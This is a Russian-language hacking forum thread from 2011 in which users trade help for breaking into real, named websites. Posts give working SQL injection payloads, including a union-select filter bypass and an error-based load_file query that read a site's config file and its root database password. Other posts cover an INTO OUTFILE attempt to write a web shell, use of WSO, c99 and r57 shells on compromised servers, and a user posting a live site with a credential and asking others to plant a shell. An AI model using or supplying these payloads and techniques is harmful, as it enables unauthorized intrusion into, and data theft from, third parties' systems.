Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    shadowrun, попробуй так http://ironmiketyson.ru/article_read.php?id=1+/*!union*/+/*!select*/+1+--+
    сам не могу проверить, проксика нет
     
    2 people like this.
  2. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    Пошло дело :) . Спасибо.
     
  3. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Нашёл очень лакомую Time-Based скулю. Подскажите нормальный софт, ориентированный именно на неё ??

    З.Ы. Канал стабильный, без скачков.
     
    _________________________
  4. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    Можно ли как-то это использовать и куда копать?
     
  5. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Для начало поищи другой уязвимый параметр
     
    1 person likes this.
  6. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Хех. Цитирую сам себя уже.

    Ну в общем нашёл я нужную утилиту. Называется Marathon Tool

    Специально заточена под Time-Based SQL

    Сайт автора тут
     
    _________________________
  7. lion-art

    lion-art Banned

    Joined:
    30 Oct 2011
    Messages:
    37
    Likes Received:
    8
    Reputations:
    1
    Прошу помощи!

    Как всегда начну с фразы: "Уважаемые знатоки!"

    Есть сайт:

    1)file_priv=y

    2)mq=off

    3) есть /test.php

    3) Доступ 4х администраторов в админку есть, доступ в админку www.site.ru/cms) - так он не пускает но если через www.site.ru/index.php/cms тогда пускает но не выполняются скрипты.

    4) прочитан config.ini есть пароль root к базе. Но путь до самой базы не известен.

    Теперь самое интересное:

    config.ini прочитан так:
    index/***/id/*21'+or+1+group+by+concat(mid(load_file(0xздесьхеш),50,163),floor(rand(0)*2))+having+min(0)+or+1+--+

    запрос на запись делаем так: /image/*****/id/*53+and+(select+'+into+outfile+')+!=1
    результат - ошибка но через пару часов при
    /image/*****/id/*53 без инъекта появляется следущее:

    яШяаJFIFHHяб4ExifII*bj(1r2Ћi‡¤шЂь 'Ђь 'Adobe Photoshop CS2 Windows2011:07:05 16:16:46†’Ъ яя Ж zLEAD Technologies Inc. V1.01FN(VЦHHяШяаJFIFHHян Adobe_CMяоAdobedЂяЫ„            яАc "яЭ яД?   3!1AQa"qЃ2‘Ў

    и т.д...

    ВНИМАНИЕ ВОПРОС!
    На сколько высока вероятность то что into outfile не получится (доходчиво: шелл не зальется?)

    P.S. возможно не правильный запрос но если запрос сделать так
    /image/*****/id/*53+and+'select+'+into+outfile+'+!=1'
    то ошибка такова:
    Invalid query: File ' !=1' already exists

    Спасибо за внимание надеюсь на коментарии, может у кого-то похожая ситуация была.
     
    #18367 lion-art, 23 Nov 2011
    Last edited: 23 Nov 2011
  8. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    На линьке WSO. Нужно из шелла попасть в одну директорию, но в ней содержится оочень много файлов одного расширения и поэтому, при заходе в директорию отображается пустая страница. Как исправить это недоразумение?
    Использовал другие шеллы: с99, r57 и т.д. Результат один и он не устраивает.
    Надеюсь вопрос корректно составлен.
     
  9. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    зайди в консоль(в шелле) ls -lah /путь/до/директории
     
    2 people like this.
  10. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    2lion-art по твоим описаниям залить шелл как два пальца об асфальт но...
    спали в ПМ линк посмотрю и отпишусь, так как трудно что то тут посоветовать а то за каждый шаг будет плодится еще вопросы.
     
    _________________________
    2 people like this.
  11. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    помогите залиться пожалуйста!

    http://www.magiccamp.com.ua/
    php:vtufgfhjkm
     
  12. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Троль! Во первых, те не сказал, что залить, во вторых - ты даже не сказал, где админка. Вот из-за этого не буду тебе давать шелл...
     
    1 person likes this.
  13. o'clock

    o'clock Elder - Старейшина

    Joined:
    16 May 2009
    Messages:
    125
    Likes Received:
    22
    Reputations:
    11
    Code:
    http://www.magiccamp.com.ua/robots.txt
    братюнь админку помочь найти?
    залить мочой прямо на сервак он просил естессна,не шелл же.


    upd:сууука,тролль пишется с двумя л


    ууумница=*
     
    #18373 o'clock, 25 Nov 2011
    Last edited: 26 Nov 2011
  14. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Ты может троль и с двумя "л", я шелл залил, но ему давать не буду.

    P.S robots.txt и без тебя врубить догадался.
     
    #18374 Osstudio, 25 Nov 2011
    Last edited: 25 Nov 2011
  15. Goodwin_

    Goodwin_ Elder - Старейшина

    Joined:
    29 May 2008
    Messages:
    61
    Likes Received:
    6
    Reputations:
    0
    есть таблица с названием - 5
    как удалить оттуда запись с id=4 ?
    вот запрос на вывод данных:
    но удалить не получается, уже перепробовал всё что можно, например:
    что я делаю не так?
     
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    Goodwin_

    где вы читали о данном способе?
     
    _________________________
  17. Goodwin_

    Goodwin_ Elder - Старейшина

    Joined:
    29 May 2008
    Messages:
    61
    Likes Received:
    6
    Reputations:
    0
    про удаление? нигде, сам написал.
     
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    тогда знайте что такое невозможно
     
    _________________________
  19. Goodwin_

    Goodwin_ Elder - Старейшина

    Joined:
    29 May 2008
    Messages:
    61
    Likes Received:
    6
    Reputations:
    0
    про delete прочитал вот тут:
    http://forum.antichat.ru/thread43966.html
    спасибо за ответ.
     
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    Goodwin_

    вышенаписанные операторы существуют, но в данном случий синтаксис вашего запроса неверный
     
    _________________________
Thread Status:
Not open for further replies.